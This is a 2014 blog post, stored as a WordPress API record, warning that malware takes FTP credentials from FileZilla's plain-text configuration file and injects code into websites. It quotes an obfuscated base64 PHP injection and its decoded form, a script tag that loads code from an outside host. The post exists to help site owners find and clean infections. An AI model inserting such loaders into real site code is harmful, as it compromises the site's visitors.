{"id":1677,"date":"2014-01-04T21:48:54","date_gmt":"2014-01-04T19:48:54","guid":{"rendered":"http:\/\/www.extradrm.com\/?p=1677"},"modified":"2020-10-04T21:52:47","modified_gmt":"2020-10-04T19:52:47","slug":"filezilla-security-hole-hacking-web-sites","status":"publish","type":"post","link":"https:\/\/www.extradrm.com\/?p=1677","title":{"rendered":"Filezilla security hole hacking web sites"},"content":{"rendered":"<div>If you are using FileZilla as your FTP client, there is malware out there that will grab your FTP credentials from the Filezilla PLAIN TEXT FILE (yikes! ) and use that information to insert that malware code (indicated by the <strong>#b58b6f#<\/strong> type of code around a &#8220;gzinflate(base64_decode)&#8221; command. That is how your files will get attacked\/compromised.<\/div>\n<div><\/div>\n<div id=\"yui_3_13_0_ym1_1_1388863149578_15651\">Look in your %APPDATA%\/Roaming\/Filezilla folder. One of the XML files in there has all your FTP web site credential (user\/password\/etc) in PLAIN TEXT! And the FileZilla people refuse to fix that obvious security hole.<\/div>\n<div><\/div>\n<div id=\"yui_3_13_0_ym1_1_1388863149578_15652\"><span style=\"text-decoration: underline;\"><strong>My recommendation is :<\/strong><\/span><\/div>\n<div>&#8211; Change your FTP Password to your hosting<\/div>\n<div>&#8211; Delete FileZilla from your computer (and you have to manually delete the folder in your APPDATA folder).<\/div>\n<div>&#8211; Use another FTP secured client<\/div>\n<div><\/div>\n<div><\/div>\n<div>Example of hacking sequence that you must clean your code from :<\/div>\n<div><strong>#c3284d#<\/strong><br \/>\n<strong>echo(gzinflate(base64_decode(&#8220;JcwxDoAgDADAr5Du0sTR4FoUEUsZEq+ntG+4vrgjsih5mAwI3YKLveyvoMrhDMwi3CHWWvXV1GbSnjBml05PBYPVPPMYvWlBZbt9S9j3kCjFvMLQ418NLw==&#8221;)));<\/strong><br \/>\n<strong>#\/c3284d#<\/strong><\/div>\n<div>is transcoded to this sequence :<br \/>\n<strong>&lt;!&#8211;c3284d&#8211;&gt;&lt;script type=&#8221;text\/javascript&#8221; src=&#8221;http:\/\/www.v-w-b.de\/includes\/ga.php?id=2&#8243; name=&#8221;googlelink&#8221;&gt;&lt;\/script&gt;&lt;!&#8211;\/c3284d&#8211;&gt;<\/strong><\/div>\n<div><\/div>\n<div>Cheers<\/div>\n","protected":false},"excerpt":{"rendered":"<p>If you are using FileZilla as your FTP client, there is malware out there that will grab your FTP credentials from the Filezilla PLAIN TEXT FILE (yikes! ) and use that information to insert&#46;&#46;&#46;<\/p>\n","protected":false},"author":1,"featured_media":2846,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[30],"tags":[],"youtube_video":null,"_links":{"self":[{"href":"https:\/\/www.extradrm.com\/index.php?rest_route=\/wp\/v2\/posts\/1677"}],"collection":[{"href":"https:\/\/www.extradrm.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.extradrm.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.extradrm.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.extradrm.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1677"}],"version-history":[{"count":0,"href":"https:\/\/www.extradrm.com\/index.php?rest_route=\/wp\/v2\/posts\/1677\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.extradrm.com\/index.php?rest_route=\/wp\/v2\/media\/2846"}],"wp:attachment":[{"href":"https:\/\/www.extradrm.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1677"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.extradrm.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1677"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.extradrm.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1677"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}